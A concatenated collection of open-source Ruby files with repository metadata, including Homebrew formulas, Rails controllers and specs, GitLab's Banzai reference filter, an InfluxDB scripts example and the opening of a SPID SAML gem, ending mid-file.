f85b1d556f57683e3f4430b896381509e696ddb3 | 174 | run_recipe File.dirname(__FILE__) + "/_common_accounts.rb"
use_manual_close
close_ledger #1
close_ledger #2
close_ledger #3
close_ledger #4
close_ledger #5
close_ledger #6
| 15.818182 | 58 | 0.810345 |
0309d5eebacfb0703ec7abb1bc50c17cb6ab9eef | 478 | cask 'busycontacts' do
version '1.3.2'
sha256 '91266016a10a33d59cc16b31d67fc211cf8e788f898be3b202cb4351175a6ca3'
url 'https://www.busymac.com/download/BusyContacts.zip'
appcast 'https://www.busymac.com/busycontacts/releasenotes.html'
name 'BusyContacts'
homepage 'https://www.busymac.com/busycontacts/index.html'
pkg 'BusyContacts Installer.pkg'
uninstall pkgutil: 'com.busymac.busycontacts.pkg',
signal: ['KILL', 'com.busymac.busycontacts']
end
| 31.866667 | 75 | 0.75523 |
08bee065a194f9e8dcef29aa2f8f8fa857761864 | 917 | class Libosip < Formula
desc "Implementation of the eXosip2 stack"
homepage "https://www.gnu.org/software/osip/"
url "https://ftpmirror.gnu.org/osip/libosip2-4.1.0.tar.gz"
mirror "https://ftp.gnu.org/gnu/osip/libosip2-4.1.0.tar.gz"
sha256 "996aa0363316a871915b6f12562af53853a9962bb93f6abe1ae69f8de7008504"
bottle do
cellar :any
revision 2
sha256 "f55f17a9fcefb3780ec0ef62dcf65e46606e6a76f86e37bbbb1a70b9de12e1b1" => :el_capitan
sha256 "87803e02c0c3b65c8f028864200425f90b5a708bb6204a410f6c76a9e35545ee" => :yosemite
sha256 "531e7d5fb51ec0ccdc05b3e3346710770f756fa8b3eb7eb2cbbbe5b2cb1c8d59" => :mavericks
sha256 "c9424adf4a5eae16c98276e958650cadb419b54b0c3b420a7d81006d423ea2f7" => :mountain_lion
end
def install
system "./configure", "--disable-debug", "--disable-dependency-tracking",
"--prefix=#{prefix}"
system "make", "install"
end
end
| 39.869565 | 95 | 0.752454 |
bf71f861900de27a6f94f5eea4871f24849ac997 | 1,624 | class PhotosController < ApplicationController
before_action :find_photos, only: [:show, :edit, :update, :destroy]
# before_action :correct_users_photos, only: [:show, :edit, :update, :destroy]
def index
@photos = current_user.photos
end
def new
@photo = Photo.new
end
def create
@photo = current_user.photos.build(photo_params)
@photo.user_id = current_user.id
if @photo.save
flash.notice = "upload successful"
redirect_to user_photo_path(current_user, @photo)
else
      flash.now[:alert] = @photo.errors.full_messages.to_sentence
render :new
# redirect_to root_path
end
end
def show
# find_photos
end
def edit
# find_photos
end
def update
if @photo.update(photo_params)
redirect_to user_photo_path(current_user, @photo)
else
      flash.now[:alert] = @photo.errors.full_messages.to_sentence
render :edit
end
end
def destroy
@photo.destroy
redirect_to user_photos_path(current_user)
end
# def like
# find_photos
# Like.create(user_id: current_user.id, photo_id: @photo.id)
# redirect_to photo_path(@photo)
# end
private
def find_photos
@photo = Photo.find(params[:id])
end
def photo_params
params.require(:photo).permit(:img_url, :description, :public, :user_id)
end
# def correct_users_photos
# @photo = current_user.photos.find_by(id: params[:id])
# end
end | 21.945946 | 84 | 0.574507 |
114aa3ed96fd6171310017a52785ed7993afbad2 | 1,448 | require 'rails_helper'
RSpec.describe "Media", type: :request do
let(:metadata) do
{author: "author", album: "albumname"}
end
let(:metadata2) do
{author: "author2", album: "albumname2"}
end
let(:digests) do
[
"aaa:1000",
"bbb:1300",
"ccc:1800"
]
end
let(:digests2) do
[
"ddd:1200",
"bbb:1600",
"eee:1900"
]
end
let(:digests3) do
[
"bbb:2300",
"ccc:2800"
]
end
describe "POST /query" do
before do
post media_path, params: {path: "/files/test.wav", metadata: metadata, digests: digests}
post media_path, params: {path: "/files/test2.wav", metadata: metadata2, digests: digests2}
post query_media_path, params: {digests: digests3}
end
it "returns the results" do
      # The expected response schema isn't specified here, so assert only that
      # the query endpoint responds successfully.
      expect(response).to have_http_status(200)
end
end
describe "POST /media" do
before do
post media_path, params: {path: "/files/test.wav", metadata: metadata, digests: digests}
end
let(:medium){ Medium.find(JSON.parse(response.body)["id"]) }
it "adds media info" do
expect(response).to have_http_status(200)
end
it "creates a medium with metadata" do
expect(medium.metadata['author']).to eq('author')
end
it "creates a medium with path" do
expect(medium.path).to eq('/files/test.wav')
end
it "creates a medium with digests" do
expect(medium.digest_locations.count).to eq(3)
end
end
end
| 20.685714 | 97 | 0.609116 |
f8548657d46ed5ba4e993e75d536e0b741dcac11 | 175 | module Spree::SearchResult
def title
raise NotImplementedError
end
def image
raise NotImplementedError
end
def url
raise NotImplementedError
end
end
| 12.5 | 29 | 0.737143 |
39ef9f29b7cb08a51346fccc61430082fdf6dbda | 1,859 | class Thor
class Argument #:nodoc:
VALID_TYPES = [ :numeric, :hash, :array, :string ]
attr_reader :name, :description, :enum, :required, :type, :default, :banner
alias :human_name :name
def initialize(name, options={})
class_name = self.class.name.split("::").last
type = options[:type]
raise ArgumentError, "#{class_name} name can't be nil." if name.nil?
raise ArgumentError, "Type :#{type} is not valid for #{class_name.downcase}s." if type && !valid_type?(type)
@name = name.to_s
@description = options[:desc]
@required = options.key?(:required) ? options[:required] : true
@type = (type || :string).to_sym
@default = options[:default]
@banner = options[:banner] || default_banner
@enum = options[:enum]
validate! # Trigger specific validations
end
def usage
required? ? banner : "[#{banner}]"
end
def required?
required
end
def show_default?
case default
when Array, String, Hash
!default.empty?
else
default
end
end
protected
def validate!
if required? && !default.nil?
raise ArgumentError, "An argument cannot be required and have default value."
elsif @enum && [email protected]_a?(Array)
raise ArgumentError, "An argument cannot have an enum other than an array."
end
end
def valid_type?(type)
self.class::VALID_TYPES.include?(type.to_sym)
end
def default_banner
case type
when :boolean
nil
when :string, :default
human_name.upcase
when :numeric
"N"
when :hash
"key:value"
when :array
"one two three"
end
end
end
end
| 24.786667 | 115 | 0.56213 |
28c9e4a1f4ddd03a6ed1118b453eff1b7337cfb4 | 1,260 | require "prawn"
class SnapApplicationExtraMemberPdf
def initialize(members:, attributes_class:, title:)
@members = members
@attributes_class = attributes_class
@title = title
end
def completed_file
pdf = Prawn::Document.new
pdf.bounding_box([40, pdf.cursor - 40], width: 500, height: 600) do
pdf.font("Helvetica", size: 16) do
pdf.text(title)
end
pdf.move_down 10
members.each do |member|
attributes = attributes_class.new(member: member)
pdf.font("Helvetica", size: 14) do
pdf.text(attributes.title)
end
attributes.to_a.each do |attribute|
pdf.text(attribute)
end
pdf.move_down 10
end
end
add_footer(pdf)
pdf.render_file(temp_file.path)
temp_file
end
private
attr_reader :members, :attributes_class, :title
def temp_file
@_temp_file ||= Tempfile.new(["snap-extra-member", ".pdf"], "tmp/")
end
def add_footer(pdf)
pdf.page_count.times do |i|
pdf.go_to_page i
pdf.image(
footer_filename,
position: :center,
vposition: :bottom,
width: 500,
)
end
end
def footer_filename
"#{Rails.root}/public/pdf_footer.jpg"
end
end
| 19.6875 | 71 | 0.621429 |
7a262dd025ce0555351fe5cc44166536f1c8d418 | 9,522 | module Banzai
module Filter
# Issues, Merge Requests, Snippets, Commits and Commit Ranges share
# similar functionality in reference filtering.
class AbstractReferenceFilter < ReferenceFilter
include CrossProjectReference
def self.object_class
# Implement in child class
# Example: MergeRequest
end
def self.object_name
@object_name ||= object_class.name.underscore
end
def self.object_sym
@object_sym ||= object_name.to_sym
end
# Public: Find references in text (like `!123` for merge requests)
#
# AnyReferenceFilter.references_in(text) do |match, id, project_ref, matches|
# object = find_object(project_ref, id)
# "<a href=...>#{object.to_reference}</a>"
# end
#
# text - String text to search.
#
# Yields the String match, the Integer referenced object ID, an optional String
# of the external project reference, and all of the matchdata.
#
# Returns a String replaced with the return of the block.
def self.references_in(text, pattern = object_class.reference_pattern)
text.gsub(pattern) do |match|
symbol = $~[object_sym]
if object_class.reference_valid?(symbol)
yield match, symbol.to_i, $~[:project], $~[:namespace], $~
else
match
end
end
end
def object_class
self.class.object_class
end
def object_sym
self.class.object_sym
end
def references_in(*args, &block)
self.class.references_in(*args, &block)
end
def find_object(project, id)
# Implement in child class
# Example: project.merge_requests.find
end
def find_object_cached(project, id)
if RequestStore.active?
cache = find_objects_cache[object_class][project.id]
get_or_set_cache(cache, id) { find_object(project, id) }
else
find_object(project, id)
end
end
def project_from_ref_cached(ref)
if RequestStore.active?
cache = project_refs_cache
get_or_set_cache(cache, ref) { project_from_ref(ref) }
else
project_from_ref(ref)
end
end
def url_for_object(object, project)
# Implement in child class
# Example: project_merge_request_url
end
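      # A hypothetical subclass sketch (illustrative only, not part of this
      # file): it simply wires together the three "implement in child class"
      # hooks above, following the example hints given in their comments.
      #
      #   class MergeRequestReferenceFilter < AbstractReferenceFilter
      #     def self.object_class
      #       MergeRequest
      #     end
      #
      #     def find_object(project, id)
      #       project.merge_requests.find(id)
      #     end
      #
      #     def url_for_object(merge_request, project)
      #       project_merge_request_url(project, merge_request)
      #     end
      #   end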
def url_for_object_cached(object, project)
if RequestStore.active?
cache = url_for_object_cache[object_class][project.id]
get_or_set_cache(cache, object) { url_for_object(object, project) }
else
url_for_object(object, project)
end
end
def call
return doc if project.nil?
ref_pattern = object_class.reference_pattern
link_pattern = object_class.link_reference_pattern
nodes.each do |node|
if text_node?(node) && ref_pattern
replace_text_when_pattern_matches(node, ref_pattern) do |content|
object_link_filter(content, ref_pattern)
end
elsif element_node?(node)
yield_valid_link(node) do |link, inner_html|
if ref_pattern && link =~ /\A#{ref_pattern}\z/
replace_link_node_with_href(node, link) do
object_link_filter(link, ref_pattern, link_content: inner_html)
end
next
end
next unless link_pattern
if link == inner_html && inner_html =~ /\A#{link_pattern}/
replace_link_node_with_text(node, link) do
object_link_filter(inner_html, link_pattern)
end
next
end
if link =~ /\A#{link_pattern}\z/
replace_link_node_with_href(node, link) do
object_link_filter(link, link_pattern, link_content: inner_html)
end
next
end
end
end
end
doc
end
# Replace references (like `!123` for merge requests) in text with links
# to the referenced object's details page.
#
# text - String text to replace references in.
# pattern - Reference pattern to match against.
# link_content - Original content of the link being replaced.
#
# Returns a String with references replaced with links. All links
# have `gfm` and `gfm-OBJECT_NAME` class names attached for styling.
def object_link_filter(text, pattern, link_content: nil)
references_in(text, pattern) do |match, id, project_ref, namespace_ref, matches|
project_path = full_project_path(namespace_ref, project_ref)
project = project_from_ref_cached(project_path)
if project && object = find_object_cached(project, id)
title = object_link_title(object)
klass = reference_class(object_sym)
data = data_attributes_for(link_content || match, project, object, link: !!link_content)
url =
if matches.names.include?("url") && matches[:url]
matches[:url]
else
url_for_object_cached(object, project)
end
content = link_content || object_link_text(object, matches)
%(<a href="#{url}" #{data}
title="#{escape_once(title)}"
class="#{klass}">#{content}</a>)
else
match
end
end
end
def data_attributes_for(text, project, object, link: false)
data_attribute(
original: text,
link: link,
project: project.id,
object_sym => object.id
)
end
def object_link_text_extras(object, matches)
extras = []
if matches.names.include?("anchor") && matches[:anchor] && matches[:anchor] =~ /\A\#note_(\d+)\z/
extras << "comment #{$1}"
end
extras
end
def object_link_title(object)
object.title
end
def object_link_text(object, matches)
text = object.reference_link_text(context[:project])
extras = object_link_text_extras(object, matches)
text += " (#{extras.join(", ")})" if extras.any?
text
end
# Returns a Hash containing all object references (e.g. issue IDs) per the
# project they belong to.
def references_per_project
@references_per_project ||= begin
refs = Hash.new { |hash, key| hash[key] = Set.new }
regex = Regexp.union(object_class.reference_pattern, object_class.link_reference_pattern)
nodes.each do |node|
node.to_html.scan(regex) do
project_path = full_project_path($~[:namespace], $~[:project])
symbol = $~[object_sym]
refs[project_path] << symbol if object_class.reference_valid?(symbol)
end
end
refs
end
end
# Returns a Hash containing referenced projects grouped per their full
# path.
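#
# Illustrative return shape (hypothetical path, not real data):
#
#   { "some-group/some-project" => #<Project id: 1, ...> }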
def projects_per_reference
@projects_per_reference ||= begin
refs = Set.new
references_per_project.each do |project_ref, _|
refs << project_ref
end
find_projects_for_paths(refs.to_a).index_by(&:full_path)
end
end
def projects_relation_for_paths(paths)
Project.where_full_path_in(paths).includes(:namespace)
end
# Returns projects for the given paths.
def find_projects_for_paths(paths)
if RequestStore.active?
cache = project_refs_cache
to_query = paths - cache.keys
unless to_query.empty?
projects = projects_relation_for_paths(to_query)
found = []
projects.each do |project|
ref = project.path_with_namespace
get_or_set_cache(cache, ref) { project }
found << ref
end
not_found = to_query - found
not_found.each do |ref|
get_or_set_cache(cache, ref) { nil }
end
end
cache.slice(*paths).values.compact
else
projects_relation_for_paths(paths)
end
end
def current_project_path
@current_project_path ||= project.path_with_namespace
end
def current_project_namespace_path
@current_project_namespace_path ||= project.namespace.full_path
end
private
def full_project_path(namespace, project_ref)
return current_project_path unless project_ref
namespace_ref = namespace || current_project_namespace_path
"#{namespace_ref}/#{project_ref}"
end
def project_refs_cache
RequestStore[:banzai_project_refs] ||= {}
end
def find_objects_cache
RequestStore[:banzai_find_objects_cache] ||= Hash.new do |hash, key|
hash[key] = Hash.new { |h, k| h[k] = {} }
end
end
def url_for_object_cache
RequestStore[:banzai_url_for_object] ||= Hash.new do |hash, key|
hash[key] = Hash.new { |h, k| h[k] = {} }
end
end
def get_or_set_cache(cache, key)
if cache.key?(key)
cache[key]
else
value = yield
cache[key] = value if key.present?
value
end
end
end
end
end
| 29.388889 | 105 | 0.588322 |
e88339408e95e0ed58e2c4d30706fbe78a7aadaf | 124 | class EducationSerializer < ActiveModel::Serializer
attributes :id, :school, :location, :startDate, :endDate, :degree
end
| 31 | 67 | 0.774194 |
2689da79e778ef00037ceac1e3e5f583d3f85178 | 2,951 | $LOAD_PATH.unshift File.expand_path('../lib', __dir__)
require 'influxdb-client'
# warning: Invokable Scripts are supported only in InfluxDB Cloud; there is currently no support in InfluxDB OSS.
url = 'https://us-west-2-1.aws.cloud2.influxdata.com'
token = '...'
bucket = '...'
org = '...'
client = InfluxDB2::Client.new(url, token, bucket: bucket, org: org, precision: InfluxDB2::WritePrecision::NANOSECOND)
unique_id = Time.now.utc.to_i.to_s
#
# Prepare data
#
point1 = InfluxDB2::Point.new(name: 'my_measurement')
.add_tag('location', 'Prague')
.add_field('temperature', 25.3)
point2 = InfluxDB2::Point.new(name: 'my_measurement')
.add_tag('location', 'New York')
.add_field('temperature', 24.3)
client.create_write_api.write(data: [point1, point2])
scripts_api = client.create_invokable_scripts_api
#
# Create Invokable Script
#
puts "------- Create -------\n"
script_query = 'from(bucket: params.bucket_name) |> range(start: -30d) |> limit(n:2)'
create_request = InfluxDB2::ScriptCreateRequest.new(name: "my_script_#{unique_id}",
description: 'my first try',
language: InfluxDB2::ScriptLanguage::FLUX,
script: script_query)
created_script = scripts_api.create_script(create_request)
puts created_script.inspect
#
# Update Invokable Script
#
puts "------- Update -------\n"
update_request = InfluxDB2::ScriptUpdateRequest.new(description: 'my updated description')
created_script = scripts_api.update_script(created_script.id, update_request)
puts created_script.inspect
#
# Invoke a script
#
# FluxTables
puts "\n------- Invoke to FluxTables -------\n"
tables = scripts_api.invoke_script(created_script.id, params: { 'bucket_name' => bucket })
tables.each do |_, table|
table.records.each do |record|
puts "#{record.time} #{record.values['location']}: #{record.field} #{record.value}"
end
end
# Stream of FluxRecords
puts "\n------- Invoke to Stream of FluxRecords -------\n"
records = scripts_api.invoke_script_stream(created_script.id, params: { 'bucket_name' => bucket })
records.each do |record|
puts "#{record.time} #{record.values['location']}: #{record.field} #{record.value}"
end
# RAW
puts "\n------- Invoke to Raw-------\n"
raw = scripts_api.invoke_script_raw(created_script.id, params: { 'bucket_name' => bucket })
puts "RAW output:\n #{raw}"
#
# List scripts
#
puts "\n------- List -------\n"
scripts = scripts_api.find_scripts
scripts.each do |script|
puts " ---\n ID: #{script.id}\n Name: #{script.name}\n Description: #{script.description}"
end
puts '---'
#
# Delete previously created Script
#
puts "------- Delete -------\n"
scripts_api.delete_script(created_script.id)
puts " Successfully deleted script: '#{created_script.name}'"
client.close!
| 32.428571 | 118 | 0.648594 |
28026191219a37dffcd63d109599100581257a08 | 1,325 | if RUBY_VERSION < "1.9"
$stderr.puts "Sorry, Cucumber features are only meant to run on Ruby 1.9+ :("
exit 0
end
require 'bundler'
Bundler.setup
require 'aruba/cucumber'
require 'aruba/jruby' if RUBY_ENGINE == 'jruby'
require 'capybara/cucumber'
require 'minitest/autorun'
require 'phantomjs/poltergeist'
# Fake rack app for capybara that just returns the latest coverage report from aruba temp project dir
Capybara.app = lambda { |env|
request_path = env['REQUEST_PATH'] || '/'
request_path = '/index.html' if request_path == '/'
[200, {'Content-Type' => 'text/html'},
[File.read(File.join(File.dirname(__FILE__), '../../tmp/aruba/project/coverage', request_path))]]
}
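# Illustrative behaviour (the step below is hypothetical, not part of this file):
# a feature step that runs `visit '/'` gets served
# tmp/aruba/project/coverage/index.html through the lambda above.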
Capybara.default_driver = Capybara.javascript_driver = :poltergeist
Before do
# JRuby takes its time... See https://github.com/cucumber/aruba/issues/134
@aruba_timeout_seconds = RUBY_ENGINE == 'jruby' ? 60 : 20
this_dir = File.dirname(__FILE__)
# Clean up and create blank state for fake project
in_current_dir do
FileUtils.rm_rf 'project'
FileUtils.cp_r File.join(this_dir, '../../test/faked_project/'), 'project'
end
step 'I cd to "project"'
end
# Workaround for https://github.com/cucumber/aruba/pull/125
Aruba.configure do |config|
config.before_cmd do
set_env('JRUBY_OPTS', '-X-C --1.9')
end
end
| 28.804348 | 101 | 0.713962 |
61250b0ff991cdde82dc1a1ffcbf8ba315fe9fe8 | 1,388 | # rubocop:disable Metrics/LineLength
# == Schema Information
#
# Table name: drama_castings
#
# id :integer not null, primary key
# locale :string not null, indexed => [drama_character_id, person_id]
# notes :string
# created_at :datetime
# updated_at :datetime
# drama_character_id :integer not null, indexed => [person_id, locale], indexed
# licensor_id :integer
# person_id :integer not null, indexed => [drama_character_id, locale], indexed
#
# Indexes
#
# index_drama_castings_on_character_person_locale (drama_character_id,person_id,locale) UNIQUE
# index_drama_castings_on_drama_character_id (drama_character_id)
# index_drama_castings_on_person_id (person_id)
#
# Foreign Keys
#
# fk_rails_13a6ca2d95 (person_id => people.id)
# fk_rails_25f32514ae (drama_character_id => drama_characters.id)
# fk_rails_aef2c89cbe (licensor_id => producers.id)
#
# rubocop:enable Metrics/LineLength
require 'rails_helper'
RSpec.describe DramaCasting, type: :model do
it { should belong_to(:drama_character).required }
it { should belong_to(:person).required }
it { should belong_to(:licensor).class_name('Producer') }
it { should validate_length_of(:locale).is_at_most(20) }
it { should validate_length_of(:notes).is_at_most(140) }
end
| 36.526316 | 98 | 0.695245 |
387d53dea3914fcc8beb5c703bc7a029f5578507 | 467 | $LOAD_PATH.unshift File.expand_path('../../lib', __FILE__)
require 'hayrick'
require 'sequel'
require 'database_cleaner'
require_relative 'support/database_setup'
require_relative 'support/helpers'
RSpec.configure do |config|
config.include Helpers
config.before(:suite) do
DatabaseCleaner.strategy = :transaction
DatabaseCleaner.clean_with(:truncation)
end
config.around(:each) do |example|
DatabaseCleaner.cleaning { example.run }
end
end
| 22.238095 | 58 | 0.762313 |
ffe7f7657e10f865a1f1af9cf1040d140bb31d8d | 3,298 | class Perl < Formula
desc "Highly capable, feature-rich programming language"
homepage "https://www.perl.org/"
url "https://www.cpan.org/src/5.0/perl-5.34.0.tar.xz"
sha256 "82c2e5e5c71b0e10487a80d79140469ab1f8056349ca8545140a224dbbed7ded"
license any_of: ["Artistic-1.0-Perl", "GPL-1.0-or-later"]
head "https://github.com/perl/perl5.git", branch: "blead"
livecheck do
url "https://www.cpan.org/src/"
regex(/href=.*?perl[._-]v?(\d+\.\d*[02468](?:\.\d+)*)\.t/i)
end
bottle do
sha256 arm64_big_sur: "8b55cc95c9de8bdcf628ae6d6f631057952fa8b0218da8ac61eafe4da65a8761"
sha256 big_sur: "5f86afbccd065524f92080bd7f35ffe6398b7dd40a8fef6f0a2a7982fd276dae"
sha256 catalina: "de0127c56612bbadc3621217b586571cab897c001344b7a1d63302a4f8f74a8e"
sha256 mojave: "2222c3f09bdcd10640720d2f52ba71e09408ead129bc77853b2fdf88fc381061"
sha256 x86_64_linux: "ade369d066b93925bced51ad47be64743969283e9e0c88fb3de2c58bfddbacee" # linuxbrew-core
end
depends_on "berkeley-db"
depends_on "gdbm"
uses_from_macos "expat"
# Prevent site_perl directories from being removed
skip_clean "lib/perl5/site_perl"
def install
args = %W[
-des
-Dprefix=#{prefix}
-Dprivlib=#{lib}/perl5/#{version}
-Dsitelib=#{lib}/perl5/site_perl/#{version}
-Dotherlibdirs=#{HOMEBREW_PREFIX}/lib/perl5/site_perl/#{version}
-Dperlpath=#{opt_bin}/perl
-Dstartperl=#!#{opt_bin}/perl
-Dman1dir=#{man1}
-Dman3dir=#{man3}
-Duseshrplib
-Duselargefiles
-Dusethreads
]
on_macos do
args << "-Dsed=/usr/bin/sed"
end
args << "-Dusedevel" if build.head?
system "./Configure", *args
system "make"
system "make", "install"
# expose libperl.so to ensure we aren't using a brewed executable
# but a system library
if OS.linux?
perl_core = Pathname.new(`#{bin/"perl"} -MConfig -e 'print $Config{archlib}'`)+"CORE"
lib.install_symlink perl_core/"libperl.so"
end
end
def post_install
on_linux do
perl_archlib = Utils.safe_popen_read("perl", "-MConfig", "-e", "print $Config{archlib}")
perl_core = Pathname.new(perl_archlib)/"CORE"
if File.readlines("#{perl_core}/perl.h").grep(/include <xlocale.h>/).any? &&
(OS::Linux::Glibc.system_version >= "2.26" ||
(Formula["glibc"].any_version_installed? && Formula["glibc"].version >= "2.26"))
# Glibc does not provide the xlocale.h file since version 2.26
# Patch the perl.h file to be able to use perl on newer versions.
# locale.h includes xlocale.h if the latter one exists
inreplace "#{perl_core}/perl.h", "include <xlocale.h>", "include <locale.h>"
end
end
end
def caveats
<<~EOS
By default non-brewed cpan modules are installed to the Cellar. If you wish
for your modules to persist across updates we recommend using `local::lib`.
You can set that up like this:
PERL_MM_OPT="INSTALL_BASE=$HOME/perl5" cpan local::lib
echo 'eval "$(perl -I$HOME/perl5/lib/perl5 -Mlocal::lib=$HOME/perl5)"' >> #{shell_profile}
EOS
end
test do
(testpath/"test.pl").write "print 'Perl is not an acronym, but JAPH is a Perl acronym!';"
system "#{bin}/perl", "test.pl"
end
end
| 34.715789 | 109 | 0.671316 |
01df9934ea334d0a2b65d874f92ea9363d312825 | 279 | # frozen_string_literal: true
module OrkaAPI
class Client
# The version of this gem.
VERSION = "0.1.0"
# The Orka API version this gem supports. Support for other versions is not guaranteed, in particular older
# versions.
API_VERSION = "1.7.0"
end
end
| 21.461538 | 111 | 0.691756 |
f76fff4d2f319d6a082ef52c685c958c2b0fa3ce | 76 | require 'spec_helper_acceptance'
# Ensure DCCP is disabled - Section 3.5.1
| 19 | 41 | 0.776316 |
ed39872a6f94c48b97bfa63543bccef4489779f7 | 1,312 | require 'spec_helper'
describe Arachni::Framework::Parts::Plugin do
include_examples 'framework'
describe '#plugins' do
it 'provides access to the plugin manager' do
expect(subject.plugins.is_a?( Arachni::Plugin::Manager )).to be_truthy
expect(subject.plugins.available.sort).to eq(
%w(wait bad with_options distributable loop default suspendable).sort
)
end
end
describe '#list_plugins' do
it 'returns info on all plugins' do
expect(subject.list_plugins.size).to eq(subject.plugins.available.size)
info = subject.list_plugins.find { |p| p[:options].any? }
plugin = subject.plugins[info[:shortname]]
plugin.info.each do |k, v|
if k == :author
expect(info[k]).to eq([v].flatten)
next
end
expect(info[k]).to eq(v)
end
expect(info[:shortname]).to eq(plugin.shortname)
end
context 'when a pattern is given' do
it 'uses it to filter out plugins that do not match it' do
expect(subject.list_plugins( 'bad|foo' ).size).to eq 2
expect(subject.list_plugins( 'boo' ).size).to eq 0
end
end
end
end
| 30.511628 | 85 | 0.55564 |
ed97ab0fce8847133da500714522fbea31bc1cac | 4,105 | # Run `rake sinatra-contrib.gemspec` to update the gemspec.
Gem::Specification.new do |s|
s.name = "sinatra-contrib"
s.version = "1.4.0"
s.description = "Collection of useful Sinatra extensions"
s.homepage = "http://github.com/sinatra/sinatra-contrib"
s.summary = s.description
# generated from git shortlog -sn
s.authors = [
"Konstantin Haase",
"Gabriel Andretta",
"Nicolas Sanguinetti",
"Eliot Shepard",
"Andrew Crump",
"Matt Lyon",
"undr"
]
# generated from git shortlog -sne
s.email = [
"[email protected]",
"[email protected]",
"[email protected]",
"[email protected]",
"[email protected]",
"[email protected]",
"[email protected]"
]
# generated from git ls-files
s.files = [
"LICENSE",
"README.md",
"Rakefile",
"ideas.md",
"lib/sinatra/capture.rb",
"lib/sinatra/config_file.rb",
"lib/sinatra/content_for.rb",
"lib/sinatra/contrib.rb",
"lib/sinatra/contrib/all.rb",
"lib/sinatra/contrib/setup.rb",
"lib/sinatra/contrib/version.rb",
"lib/sinatra/cookies.rb",
"lib/sinatra/decompile.rb",
"lib/sinatra/engine_tracking.rb",
"lib/sinatra/extension.rb",
"lib/sinatra/json.rb",
"lib/sinatra/link_header.rb",
"lib/sinatra/multi_route.rb",
"lib/sinatra/namespace.rb",
"lib/sinatra/reloader.rb",
"lib/sinatra/respond_with.rb",
"lib/sinatra/streaming.rb",
"lib/sinatra/test_helpers.rb",
"sinatra-contrib.gemspec",
"spec/capture_spec.rb",
"spec/config_file/key_value.yml",
"spec/config_file/key_value.yml.erb",
"spec/config_file/key_value_override.yml",
"spec/config_file/missing_env.yml",
"spec/config_file/with_envs.yml",
"spec/config_file/with_nested_envs.yml",
"spec/config_file_spec.rb",
"spec/content_for/different_key.erb",
"spec/content_for/different_key.erubis",
"spec/content_for/different_key.haml",
"spec/content_for/different_key.slim",
"spec/content_for/layout.erb",
"spec/content_for/layout.erubis",
"spec/content_for/layout.haml",
"spec/content_for/layout.slim",
"spec/content_for/multiple_blocks.erb",
"spec/content_for/multiple_blocks.erubis",
"spec/content_for/multiple_blocks.haml",
"spec/content_for/multiple_blocks.slim",
"spec/content_for/multiple_yields.erb",
"spec/content_for/multiple_yields.erubis",
"spec/content_for/multiple_yields.haml",
"spec/content_for/multiple_yields.slim",
"spec/content_for/passes_values.erb",
"spec/content_for/passes_values.erubis",
"spec/content_for/passes_values.haml",
"spec/content_for/passes_values.slim",
"spec/content_for/same_key.erb",
"spec/content_for/same_key.erubis",
"spec/content_for/same_key.haml",
"spec/content_for/same_key.slim",
"spec/content_for/takes_values.erb",
"spec/content_for/takes_values.erubis",
"spec/content_for/takes_values.haml",
"spec/content_for/takes_values.slim",
"spec/content_for_spec.rb",
"spec/cookies_spec.rb",
"spec/decompile_spec.rb",
"spec/extension_spec.rb",
"spec/json_spec.rb",
"spec/link_header_spec.rb",
"spec/multi_route_spec.rb",
"spec/namespace/foo.erb",
"spec/namespace/nested/foo.erb",
"spec/namespace_spec.rb",
"spec/okjson.rb",
"spec/reloader/app.rb.erb",
"spec/reloader_spec.rb",
"spec/respond_with/bar.erb",
"spec/respond_with/bar.json.erb",
"spec/respond_with/foo.html.erb",
"spec/respond_with/not_html.sass",
"spec/respond_with_spec.rb",
"spec/spec_helper.rb",
"spec/streaming_spec.rb"
]
s.add_dependency "sinatra", "~> 1.4.0"
s.add_dependency "backports", ">= 2.0"
s.add_dependency "tilt", "~> 1.3"
s.add_dependency "rack-test"
s.add_dependency "rack-protection"
s.add_dependency "eventmachine"
s.add_development_dependency "rspec", "~> 2.3"
s.add_development_dependency "haml"
s.add_development_dependency "erubis"
s.add_development_dependency "slim"
s.add_development_dependency "rake"
end
| 32.070313 | 61 | 0.687942 |
ababc759df9380ceb1144a42b84fb588a985a5b4 | 2,999 | # frozen_string_literal: true
require "spid/saml2"
require "spid/sso"
require "spid/slo"
require "spid/rack"
require "spid/metadata"
require "spid/version"
require "spid/configuration"
require "spid/identity_provider_manager"
require "spid/synchronize_idp_metadata"
module Spid # :nodoc:
class UnknownAuthnComparisonMethodError < StandardError; end
class UnknownAuthnContextError < StandardError; end
class UnknownDigestMethodError < StandardError; end
class UnknownSignatureMethodError < StandardError; end
class UnknownAttributeFieldError < StandardError; end
class MissingAttributeServicesError < StandardError; end
class PrivateKeyTooShortError < StandardError; end
class CertificateNotBelongsToPKeyError < StandardError; end
EXACT_COMPARISON = :exact
MINIMUM_COMPARISON = :minimum
BETTER_COMPARISON = :better
MAXIMUM_COMPARISON = :maximum
BINDINGS_HTTP_POST = "urn:oasis:names:tc:SAML:2.0:bindings:HTTP-POST"
BINDINGS_HTTP_REDIRECT = "urn:oasis:names:tc:SAML:2.0:bindings:HTTP-Redirect"
COMPARISON_METHODS = [
EXACT_COMPARISON,
MINIMUM_COMPARISON,
BETTER_COMPARISON,
MAXIMUM_COMPARISON
].freeze
SHA256 = "http://www.w3.org/2001/04/xmlenc#sha256"
SHA384 = "http://www.w3.org/2001/04/xmldsig-more#sha384"
SHA512 = "http://www.w3.org/2001/04/xmlenc#sha512"
DIGEST_METHODS = [
SHA256,
SHA384,
SHA512
].freeze
RSA_SHA256 = "http://www.w3.org/2001/04/xmldsig-more#rsa-sha256"
RSA_SHA384 = "http://www.w3.org/2001/04/xmldsig-more#rsa-sha384"
RSA_SHA512 = "http://www.w3.org/2001/04/xmldsig-more#rsa-sha512"
SIGNATURE_METHODS = [
RSA_SHA256,
RSA_SHA384,
RSA_SHA512
].freeze
SIGNATURE_ALGORITHMS = {
SHA256 => OpenSSL::Digest::SHA256.new,
SHA384 => OpenSSL::Digest::SHA384.new,
SHA512 => OpenSSL::Digest::SHA512.new,
RSA_SHA256 => OpenSSL::Digest::SHA256.new,
RSA_SHA384 => OpenSSL::Digest::SHA384.new,
RSA_SHA512 => OpenSSL::Digest::SHA512.new
}.freeze
L1 = "https://www.spid.gov.it/SpidL1"
L2 = "https://www.spid.gov.it/SpidL2"
L3 = "https://www.spid.gov.it/SpidL3"
AUTHN_CONTEXTS = [
L1,
L2,
L3
].freeze
SUCCESS_CODE = "urn:oasis:names:tc:SAML:2.0:status:Success"
ATTRIBUTES_MAP = {
spid_code: "spidCode",
name: "name",
family_name: "familyName",
place_of_birth: "placeOfBirth",
